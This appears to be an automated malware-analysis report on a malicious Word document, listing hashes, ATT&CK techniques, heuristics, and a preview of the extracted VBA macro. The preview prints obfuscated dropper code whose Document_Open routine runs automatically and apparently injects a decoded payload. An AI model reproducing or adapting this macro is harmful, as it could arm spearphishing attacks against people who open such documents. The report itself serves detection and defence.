Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5501becff6eb4ca1…

MALICIOUS

Office (OLE)

Size: 209.5 KB
Created: 2017-07-31 23:01:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: 0e1fc57d3f888c5658b0068a977b8b21
SHA-1: 931cecb7200f8ad2588fb24923dbdfdf904bea89
SHA-256: 5501becff6eb4ca1f77eb75a1d66130b112e7d2d4b706ef597602ebdcc654179
Risk score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The presence of a 'Document_Open' macro and a large amount of slack space in the OLE structure are strong indicators of malicious intent. The VBA macro 'condition' appears to be designed to download and execute a second-stage payload, although the exact URL is obfuscated. The macro's execution is triggered automatically upon opening the document, consistent with a spearphishing attachment.

Heuristics (4)

  • OLE document has large unaccounted-for region (severity: high) OLE_SLACK_ANOMALY
    OLE file is 214,530 bytes but its declared streams total only 120,359 bytes — 94,171 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (severity: medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Document_Open macro (severity: high) OLE_VBA_DOCOPEN
    Document contains a Document_Open macro, which runs automatically when the document is opened.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5235 bytes
SHA-256: 6241d1f34d13284cae72a23dd624a58d442104634c2473f67b4bdad262c7428d

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Sub condition()
Dim anaesthetize As Long
Dim angora As Long
coumarouna.nitrile.Value = Day(#12/5/2013#)
varday = aphonic = unintroduced
inconsiderable = "evade"
deanery = "plagihedral"
allowable = "replacement"
forlorn = "bakshish"

melody = "oak"
slickness = asynchronism
Set linebacker = coumarouna.nitrile.SelectedItem
naturalization = 18
absterge = 8684
pummel = 274789
 Pmt 0, naturalization, 23499, 35977, 8

fragmentary = linebacker.Name
dying = 7844
doit = Right(fragmentary, dying)
salerno = cefoperazone.bond(doit)
cestrum = 82
blackquarter = 6831
cloudlessness = 491648
 Pmt 0, cestrum, 5134, 58763, 6

thrush = "tinctorial"
bad = androgen
#If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then
Dim physique As String
Dim snowball As LongPtr
Dim sapienti As LongPtr
Dim acanthus As String
#End If
#If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then
Dim overstrung As Long
Dim sapienti As Long
Dim fingerspelling As Integer
Dim snowball As Long
#End If
cellist = 39 - 39
leeway = "bungalow"
chaeronea = 4096
duet = 54
bavardage = 32580
sabbatarianism = 387888
 Pmt 0, duet, 19269, 31789, 5

conceivably = "sayornis"
potaufeu = "pessimal"
forasmuch = "honeycombed"
aim = "tinctured"
dissuasive = 109
morphologic = 35974
cieceronian = 129205
 Pmt 0, dissuasive, 8641, 35516, 4

aerobic = salerno
neve = "balister"
scotch = "kingdom"
snowball = blockade(aerobic)
confuted = "luddite"
#If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then
Dim unhewn As String
Dim onepan As LongPtr
Dim introspection As LongPtr
Dim parthenocissus As LongPtr
inapplicability = 25 + 126 + 1913
#End If
#If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then
Dim onepan As Long
bawbee = 78 + 6 + 697
Dim introspection As Long
Dim parthenocissus As Long
inapplicability = bawbee + 3459

#End If
Dim temporis As Byte
Dim drixoral As Long
onepan = 0
sapienti = snowball + inapplicability
introspection = 99 - 83 + 201511
parthenocissus = 3500
artificially = odyllic(introspection, onepan, sapienti, onepan, onepan, onepan, onepan)
perfective = 7
pellicle = 30898
arborescence = 400949
 Pmt 0, perfective, 36836, 48257, 4

End Sub
Private Sub Document_Open()
Dim phylloxeridae As Integer
Dim nootka As Integer
coagulation = "rollicker"
equisetum = "enology"
condition
erroneousness = 90 + 2
boron = 28700 + 6
morose = 595280 + 6
 Pmt 0, erroneousness, 12009, 20396, 2
End Sub

Function cooptation(morsel, damnosa, houseroom)
#If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then
Dim micelle As Integer
Dim himantoglossum As Integer
Dim ea As LongPtr
Dim southbound As LongPtr
Dim delivery As LongPtr
Dim unfrock As Variant
Dim paralytic As LongPtr
Dim headship As LongPtr
#End If
#If (3 * 4 + 5) > (7 - 2 * 1) And Not Win64 > (10 - 5 * 2) * 2 Then
Dim southbound As Long
Dim unreservedly As Integer
Dim ea As Long
Dim placate As Byte
Dim paralytic As Long
Dim dispensary As String
Dim delivery As Long
Dim balmy As Byte
Dim headship As Long
Dim drone As Byte
Dim aspera As Integer
#End If
alto = andorra
blister = Math.Round(210)
southbound = morsel
headship = houseroom
andorra = "apium"
paralytic = damnosa
traditionary = 92
alliaria = 4950
compages = 134484
 Pmt 0, traditionary, 5377, 12066, 6

blister = Fix(476)
ea = 78 + 34 - 113
encage ByVal ea, southbound, paralytic, headship, delivery
raven = blister \ 215
End Function
Function blockade(adynamic)
Dim catchpenny As Integer
Dim perceptible As String
Dim rape As Byte
Dim antilogy As Variant
#If (20 / 4 + 5) > (6 - 2 * 1) And Win64 > (15 - 5 * 3) * 3 Then
Dim depurate As Byte
Dim sich As LongPtr
depicture = 12 - 4
Dim memo As LongPtr
Dim frighte
... (truncated)